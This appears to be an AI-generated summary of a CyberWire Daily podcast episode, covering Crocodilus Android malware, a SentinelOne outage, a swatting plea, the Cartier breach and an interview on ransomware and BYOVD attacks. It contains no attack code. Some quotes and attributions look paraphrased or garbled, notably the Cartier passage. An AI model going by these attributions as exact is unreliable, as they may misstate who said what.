“China, alongside Russia, Iran and North Korea, is becoming more aggressive in cyberspace.”
— Wendi Whitmore, Palo Alto Networks [00:44]
FCC’s Proposed Ownership Reporting Rules
The Federal Communications Commission (FCC) has proposed new rules to expand ownership reporting requirements, aiming to identify and mitigate control by foreign adversaries.
Summary:
The proposed regulations will affect entities not previously required to report ownership, including private radio license holders and video service providers. Companies must disclose if they are controlled by foreign adversaries such as China, Russia, Iran, or North Korea, especially if these parties hold 10% or more in voting or equity interest. Non-compliance could result in fines or license revocation. Additionally, the FCC is considering periodic reporting updates, with the final rules expected to take effect by 2026.
Legislative Action:
Senators Jim Risch and John Hickenlooper introduced the Energy Threat Analysis Program Act to bolster cybersecurity collaboration within the US energy sector. This legislation seeks to formalize the Department of Energy's Energy Threat Analysis Center as a central hub for cyber threat intelligence, addressing fragmented threat reporting and enhancing early warnings and threat mitigation strategies.
Notable Quote:
“The goal is to improve early warnings and threat mitigation in response to increasingly complex cyber attacks.”
— Dave Bittner [00:32]
Crocodilus Android Malware Evolves
The Crocodilus Android malware has introduced new features that add fake contacts to victims' phones, enabling attackers to spoof calls from trusted sources like banks or friends.
Details:
Initially observed in Turkey in early 2025, Crocodilus has since expanded globally, targeting victims across all continents. The malware now incorporates advanced social engineering tactics and enhanced evasion techniques such as code packing and local data parsing. Researchers urge users to download apps exclusively from trusted sources to mitigate these threats.
Warning:
“Crocodilus is evolving fast and urges users to download apps only from trusted sources.”
— Dave Bittner [00:36]
SentinelOne Global Outage
SentinelOne experienced a significant outage on May 29, impacting its services for approximately 20 hours.
Impact:
The outage affected access to the SentinelOne management console but did not compromise endpoint protection or customer data. The disruption was caused by a flaw in a legacy infrastructure control system, triggered by a faulty configuration from a new account setup. In response, SentinelOne is accelerating its transition to a new infrastructure-as-code architecture, enhancing automated recovery processes, and improving customer communication protocols. Notably, GovCloud customers remained unaffected due to infrastructure segregation.
Notable Quote:
“SentinelOne has published a detailed analysis of the global outage that impacted its services...”
— Dave Bittner [00:37]
Swatting Campaign Case
A Romanian citizen, Tomasz Szabo, has pleaded guilty to orchestrating a swatting campaign targeting around 100 individuals, including a former US president and members of Congress.
Details:
The campaign involved making false emergency calls to provoke aggressive police responses, including hoaxes of fake murders and bomb threats at officials' residences. Szabo acted in collaboration with Serbian co-defendant Nemanja Radovanovic, who faces pending charges.
Notable Quote:
“The indictment describes politically neutral targeting and includes a January 2024 hoax involving a fake murder and bomb threat at a former official's home.”
— Dave Bittner [00:38]
Cartier Data Breach
Luxury brand Cartier has disclosed a data breach where an unauthorized party accessed its systems, collecting names, emails, and countries of residence.
Response:
Cartier assured customers that it has strengthened its cybersecurity measures and advised vigilance against any suspicious or mysterious messages. The company emphasized that the breach was brief and not intended for malicious purposes, humorously noting, “presumably not for a holiday card list.” This incident follows similar breaches reported by Dior and Tiffany in May.
Notable Quote:
“Cartier advises staying wary of any mysterious messages.”
— Dave Bittner [00:39]
Dave Bittner engages in a comprehensive discussion with John Miller, CEO and co-founder of Halcyon, focusing on ransomware threats and innovative defense mechanisms.
Halcyon’s Focus on Anti-Ransomware:
Miller explains that Halcyon is the first company dedicated exclusively to anti-ransomware solutions. Unlike generalized cybersecurity tools that adhere to frameworks like MITRE’s ATT&CK, Halcyon dissects ransomware behaviors to build tailored defenses, effectively addressing the specific tactics used by ransomware groups.
Ransomware as a Business Model:
“Ransomware is a business. They're all about ROI... if you build the biggest obstacle for that, you break them.”
— John Miller [14:20]
Evolution of Ransomware Tactics:
The conversation delves into the shift from traditional encryption-based ransomware to double and potentially triple extortion techniques. Double extortion involves threatening to leak stolen data alongside encrypting it, increasing pressure on victims to pay ransoms. Miller anticipates the future of triple extortion, where attackers leverage AI to exploit stolen data further, making ransomware attacks even more devastating.
Bring Your Own Vulnerable Driver (BYOVD) Attacks:
Miller introduces the concept of BYOVD attacks, where attackers exploit outdated, still-signed Windows drivers with known vulnerabilities to gain kernel-level access, bypassing traditional Endpoint Detection and Response (EDR) systems.
Explanation:
“Instead of going out and finding a zero-day and writing an exploit, I can take an old Windows driver that's still signed and valid.”
— John Miller [21:01]
Halcyon’s Defensive Strategy:
Halcyon employs multiple layers of protection, including machine learning models trained specifically on ransomware behavior, to detect and halt ransomware activities before they can inflict significant damage. Their approach emphasizes resilience, ensuring that even if a ransomware attack is partially successful, recovery processes can neutralize the threat swiftly.
Notable Quote:
“If we think it's ransomware, we kill it.”
— John Miller [23:40]
Future of Ransomware:
The discussion concludes with Miller warning of the escalating sophistication and accessibility of ransomware attacks, highlighting the low barrier to entry and the potential for widespread disruption in the coming years.
Dave Bittner also features a dialogue with Maria Varmazis from the T-Minus Space Daily podcast, delving into the collaborative efforts by major cybersecurity firms to standardize hacker group nomenclature.
Current Challenges:
The cybersecurity community faces significant confusion due to disparate naming conventions for hacker groups across different organizations. This fragmentation complicates threat intelligence sharing and communication.
Collaboration Efforts:
Microsoft, CrowdStrike, Google's Mandiant, and Palo Alto Networks have joined forces to create a unified framework for naming hacker groups. The initiative aims to act as a "Rosetta Stone," allowing cross-referencing between existing naming standards.
Implementation Concerns:
Both guests express skepticism about the practicality and effectiveness of the new standard, citing potential redundancies and maintenance challenges.
Maria’s Concern:
“Good luck to whoever has to maintain that. That's gonna be such a nightmare...”
— Maria Varmazis [31:32]
John’s Suggestion:
“We will be forever grateful and we will forgive you for the redundancy that this new standard seems to be introducing to the ecosystem.”
— John Miller [32:25]
Dave Bittner wraps up the episode by encouraging listeners to access the CyberWire daily briefing for comprehensive coverage of today’s stories. Additionally, he invites audience participation through the annual survey to gather listener insights.
Following the structured content, the podcast includes sponsored messages from SpyCloud, Vanta, and DeleteMe. As per the summary guidelines, these advertisements have been omitted to focus solely on the informative and analytical content of the episode.
Credits
N2K's Senior Producer: Alice Carruth
CyberWire Producer: Liz Stokes
Mixed by: Trey Hester
Original Music and Sound Design: Elliot Peltzman
Executive Producer: Jennifer Eiben
Publisher: Peter Kilpe
This detailed summary encapsulates the key discussions, insights, and conclusions presented in the "Zero-day Déjà Vu" episode of CyberWire Daily, providing a comprehensive overview for those who may not have had the chance to listen.